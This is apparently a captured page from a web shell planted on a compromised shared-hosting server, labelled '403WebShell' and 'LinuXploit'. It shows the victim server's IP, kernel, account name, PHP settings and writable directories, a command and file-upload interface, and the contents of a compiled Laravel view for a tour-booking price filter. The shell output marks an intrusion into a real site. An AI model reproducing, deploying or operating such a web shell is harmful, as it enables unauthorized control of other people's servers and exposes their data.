Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.18.73
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/storage/framework/views/e082f1d60e2ad2f108a7cb38875325487cddc6f6.php
<div class="filter-item filter-simple dropdown">
    <div class="form-group dropdown-toggle" data-toggle="dropdown" >
        <h3 class="filter-title"><?php echo e(__('Price filter')); ?> <i class="fa fa-angle-down"></i></h3>
    </div>
    <div class="filter-dropdown dropdown-menu dropdown-menu-right">
        <div class="bravo-filter-price">
            <?php
            $price_min = $pri_from = floor ( App\Currency::convertPrice($tour_min_max_price[0]) );
            $price_max = $pri_to = ceil ( App\Currency::convertPrice($tour_min_max_price[1]) );
            if (!empty($price_range = Request::query('price_range'))) {
                $pri_from = explode(";", $price_range)[0];
                $pri_to = explode(";", $price_range)[1];
            }
            $currency = App\Currency::getCurrency( App\Currency::getCurrent() );
            ?>
            <input type="hidden" class="filter-price irs-hidden-input" name="price_range"
                   data-symbol=" <?php echo e($currency['symbol'] ?? ''); ?>"
                   data-min="<?php echo e($price_min); ?>"
                   data-max="<?php echo e($price_max); ?>"
                   data-from="<?php echo e($pri_from); ?>"
                   data-to="<?php echo e($pri_to); ?>"
                   readonly="" value="<?php echo e($price_range); ?>">
            <div class="text-right">
                <br>
                <a href="#" onclick="return false;" class="btn btn-primary btn-sm btn-apply-advances"><?php echo e(__("APPLY")); ?></a>

            </div>
        </div>
    </div>
</div><?php /**PATH /home/book24/public_html/modules/Tour/Views/frontend/layouts/search-map/fields/price.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit